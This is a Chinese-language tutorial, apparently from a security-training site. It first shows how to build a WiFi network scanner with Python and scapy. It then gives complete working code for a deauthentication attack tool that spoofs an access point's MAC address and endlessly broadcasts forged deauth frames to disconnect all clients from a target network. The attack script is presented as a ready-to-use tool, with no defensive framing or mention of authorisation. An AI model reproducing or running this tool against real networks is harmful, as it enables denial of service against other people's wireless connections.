本文来源于i春秋学院,未经允许严禁转载。
0x00 前言
因为在百度上很难找到有关于用python打造WiFidos的工具的,而且不希望大家成为一名脚本小子,所以我打算写一篇,需要的工具有scapy,iwconfig(能开启你网卡监听功能的工具),当然少不了python,我这里是kali2.0的环境,所以可能跟你们的有所不同
0x01配置scapy
先打开python2.7解释器,scapy是只支持2.x的,不支持3,先输入下列命令,在python解释器里面
from scapy.all import *
会出现如下图的显示
这种情况是因为他有IPV6的东西包含了进去,这些东西不必要而且还影响整个程序的美观,所以要把这东西去掉。
在kali里面scapy有好几个,但是真正是给python用的就是这个路径:usr/share/pyshared/scapy
打开all.py把里面导入ipv6的东西注释掉
把这3行注释了在用一下
from scapy.all import *
这次就不会有那个东西了
但是我们还没有配置完,还有一个地方要配置,因为scapy的send函数,只要发送一个数据包就会执行
print "send %s packets"
还有
os.write(1,'.')
但是我们如果要发送多个数据包的时候,那这种功能就变成刷屏了,
这些功能是在:usr/share/pyshared/scapy下一个叫sendrecv,我这里直接搜索了
打开这个文件,找到__gen_send这个函数,然后把他的输出的地方注释了,然后在底下输入pass,不然会报错,如下图所示
好了我们现在就算配置完毕了。
0x02 802.11数据包结构简单分析 (不会对原理过多讲解)
要用wireshark捕获802.11数据包首先要让网卡变成监听模式
下面是iwconfig方法开启
ifconfig iface down
iwconfig iface mode monitor
ifconfig iface up
下面是aircrack-ng开启
airmon-ng start iface
2种方法都行,现在开始分析
首先802.11数据包有一个RadioTap头
注意我箭头指着的地方,那里就是RadioTap头,radiotap包含一些关于数据帧的额外信息,想了解更多可以参考http://www.radiotap.org
之后就是IEEE 802.11数据
这里只提几个地方
第一个Type/Subtype,简单来说,就是来声明这个数据包是什么拿来干什么的。
第二个就是receiver address(RA)和destination address(DA),为什么要把这2个放在一起讲呢,就是因为这2个其实是完全一样的,如下图
2个的数据包真实的地方是完全一样的,这个地址代表最终要到达的地方
第三个就是transmitter address(TA)和source address(SA),他们跟第二个也是相同,都是一样的,所以一起讲,TA就是当前发送数据包的地址,SA代表源发送地址,所以都是自己
第四个就是bssid,bssid就是路由器的地址
第五个就是ESSID(ESSID就是WiFi的名字),只会出现在type/subtype是0/8,也就是beacon frame的时候,beacon frame就是用来通知别人他的存在,里面会包含一些其他数据,其中就有ESSID,这个数据包不是上面4个那样,他是跟在他们屁股后面的,如图
essid就在如下图的地方
0x03 打造一款简易WiFi探测器
现在基础的部分讲完,开始真正实战了。
首先看看我们需要的数据包,scapy是一款很强大的工具,提供各种数据包类型,可以用ls()查看
这里我们只需要和802.11相关的,也就是如下图所示
也就是RadioTap() Dot11() Dot11Elt,当然,还有一个Dot11Deauth,但是不是这个小节要讲的,所以先不说RadioTap()也不用怎么讲,知道他是第一个就好了,这些都是用来构造数据包的方法
先来看看Dot11这个数据包
这里addr1就是刚刚的RA DA,addr2就是TA SA,addr3就是BSSID,(应该是这样,我也不能肯定,如果有错尽管指出)
在来看看Dot11Elt
这里info就是ESSID了,
还有一个函数需要了解一下,就是sniff(),他的功能就跟他的名字一样,用来嗅探的,他有1个参数需要提一下,prn=func,当嗅探到一个数据包的时候就会调用func,并且把数据包传给func
现在该说的都说了,我就把代码全部拿出来吧
#coding:utf-8
from scapy.all import *
wifi = {}
def scan(packet): dot = packet.getlayer(Dot11)#从数据包里面提取Dot11这一层的数据,如果没有这一层,返回None if dot != None: elt = dot.getlayer(Dot11Elt)#从数据包提取Dot11Elt这一层的数据 if elt != None: if dot.type == 0 and dot.subtype == 8:#检查是否为beacon frame数据包,因为beacon frame是用来通知用户自己的存在的 bssid = dot.addr3.upper()#提取BSSID essid = elt.info#提取ESSID if not wifi.has_key(bssid):#检查是否已经存在字典中,以免打印重复 wifi[bssid]=essid if essid == "":#有些路由器会隐藏自己的ESSID所以这里为空 essid = "" print essid+": "+bssid sniff(prn=scan)#绑定scan函数
这就是运行效果,第一行我之前没有去掉,所以有第一行
0x04 打造WiFiDDOS器
如何DDOSWiFi呢,其实很简单,因为802.11的设计导致的,这里有一个Deauth数据,当路由器或者用户发生一些问题的时候,路由器就会发送Deauth数据包来告诉用户不能连接了,然后用户就会与路由器断开连接,所以我们就模拟这种数据包,发送数据包,来达到断网
当要发送Deauth数据包的时候,Dot11的type/subtype是0/12的时候,因为type默认为0,所以待会构造数据包的时候只用让subtype等于0xC就好,然后一个Dot11Deauth会跟在Dot11后面,就像如图的那种关系
就类似与这样的关系,代码就是这样构造的
RadioTap()\Dot11()\Dot11Deauth()
有1个函数要介绍一下sendp,工作在第二层用来发送数据包的,有一个参数要说一下,就是iface=网卡,用来设置什么网卡来发送数据包的,要发送的数据包直接放在参数第一个,比如数据包的名字叫pkt,网卡为wlan0,那就是sendp(pkt,iface='wlan0')
#coding:utf-8
import sys
from scapy.all import * from optparse import OptionParser#这个我不讲,因为不是本章重点,请自行百度 usage="Usage:%prog -i interface -t packet-type -a bssid -c client-MAC(optional)" parser=OptionParser(usage) parser.add_option('-i',dest="interface",help="network card") parser.add_option('-t',dest="type",help="the reason for the termination code,0-9(optional)") parser.add_option('-a',dest="bssid",help="the Access Point you want to attack") parser.add_option('-c',dest="c_mac",help="the client's MAC address(optional)") (options,args) = parser.parse_args() if len(sys.argv) < 2: parser.print_help() sys.exit(0) elif options.interface is None or \ options.bssid is None: parser.print_help() sys.exit() c_mac = options.c_mac t_type = options.type iface = options.interface bssid = options.bssid if t_type == None: t_type = 0 if c_mac == None: c_mac = "ff:ff:ff:ff:ff:ff".upper()#如果用户没有输入地址,就赋值为广播地址(让连接WiFi的全部断网) pkt = RadioTap()/\ Dot11(subtype=0x00c,addr1=c_mac,addr2=bssid,addr3=bssid)/\#addr1为最终要到达的地址,addr2为来源地址这伪造成路由器MAC,addr3就不说了,subtype为0x00c代表为Deauth数据包 Dot11Deauth(reason=int(t_type))#定义为什么会断线 while True: sendp(pkt,iface=iface)#无限发送数据包
0x05 结束语
我写这篇文章,主要的目的就是不希望大家成为一名脚本小子,只会用别人的工具,而不能自己开发工具,我感觉这样是很窝囊的,一辈子只能活在别人的脚下。